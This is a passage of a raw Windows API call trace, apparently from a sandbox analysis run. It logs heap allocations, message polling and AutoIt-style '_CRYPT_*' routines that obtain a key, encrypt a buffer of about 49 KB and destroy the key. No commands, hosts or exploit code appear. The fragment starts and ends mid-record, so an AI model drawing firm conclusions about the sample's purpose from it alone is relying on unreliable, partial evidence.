(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0030.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0030.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0030.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0030.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0030.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0030.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0030.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0030.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0030.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0030.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0030.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0030.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.692] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0030.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0030.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0030.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0030.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0030.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0030.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0030.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0030.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0030.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0030.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0030.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0030.693] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0030.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0030.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0030.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0030.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0030.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0030.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0030.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0030.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0030.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.693] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.693] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0030.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb68 [0030.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0030.694] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0030.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0030.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0030.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0030.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0030.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0030.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0030.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0030.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0030.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0030.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0030.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0030.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0030.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0030.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0030.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0030.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0030.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0030.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0030.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0030.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0030.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0030.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0030.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0030.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0030.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0030.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0030.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0030.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0030.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0030.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0030.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0030.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0030.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0030.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0030.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0030.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0030.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0030.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0030.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0030.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0030.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0030.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0030.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0030.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0030.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0030.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0030.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0030.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0030.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0030.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0030.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0030.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0030.697] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0030.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0030.697] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da248, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da248*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0030.697] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.697] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.697] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.697] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.697] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.697] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.697] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.697] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.697] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0030.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0030.697] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.697] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0030.697] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.697] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.697] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.697] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0030.697] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.697] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0030.698] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0030.698] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.698] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xbf70, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xbf80) returned 1 [0030.698] CharLowerBuffW (in: lpsz="byte[49025]", cchLength=0xb | out: lpsz="byte[49025]") returned 0xb [0030.699] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.699] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.699] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8c3e20*, pdwDataLen=0x6ae220*=0xbf70, dwBufLen=0xbf80 | out: pbData=0x8c3e20*, pdwDataLen=0x6ae220*=0xbf80) returned 1 [0030.700] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0030.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.700] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.700] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.703] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0030.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.704] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.704] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.704] CryptDestroyKey (hKey=0x7c2280) returned 1 [0030.704] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0030.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.704] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.704] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.704] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0030.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.704] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: 